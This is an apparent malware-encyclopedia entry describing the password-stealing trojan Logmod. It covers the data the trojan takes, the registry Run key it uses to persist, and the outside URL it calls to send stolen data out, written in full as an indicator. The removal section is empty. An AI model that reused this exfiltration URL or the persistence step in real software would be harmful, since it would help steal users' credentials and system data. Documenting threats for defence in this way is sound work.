Home>Trojan Programs>PSW Trojans>

Trojan-PSW.Win32.Logmod.a

Malware Behavior and Technical Description

The Logmod program belongs to the family of password stealing trojans.

Logmod steals the following information: Windows version, Explorer version, phone book entries, service provider information, RAS data, modem log, e.t.c.

When run the trojan installs itself into the system. While installing the Logmod trojan registers itself in the system registry auto-run section:

 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  Sysres = Sysres.exe

The trojan does not copy/move its file to any other directory, thus it cannot automatically run on Windows boot-up (except if it is originally placed in the Windows or Windows system directory). Therefore, for example, it cannot "install" itself into the system while being run from email attachments. There should be an additional component ("dropper") that installs the trojan into the system.

To send stolen data out of infected computers the Logmod opens an Internet URL with the following request:

http://stats.internetsexprovider.com/resident/SysWeb.php3?country=espana4&Login=

        
0 
        
Removal Trojan-PSW.Win32.Logmod.a instructions: 
        
0    
		
  
 

      

        

          

            
Need help?  Live computer support via remote at SupportSpace.Help with printer problems, windows, hardware, software, spyware removal and more. - Go Now!

            
          
        
      

      

          

            


          
          

            

                	
Great Anti-Virus Software : Kaspersky Internet Security 2009
Save 35% Buy Panda Global Protection 2009 and Panda Antiviru
Download PandaLabs Reports 
Free AVG virus removel tools
Hunting Down Spyware and Adware 
Adware and spyware, knowing the basics
Adware Spyware Remover from CBAdvance
Keeping Your Computer in Good Condition Using Free Spyware A
Beware of Covert Online Spies
Why the Need to Remove Adware and Spyware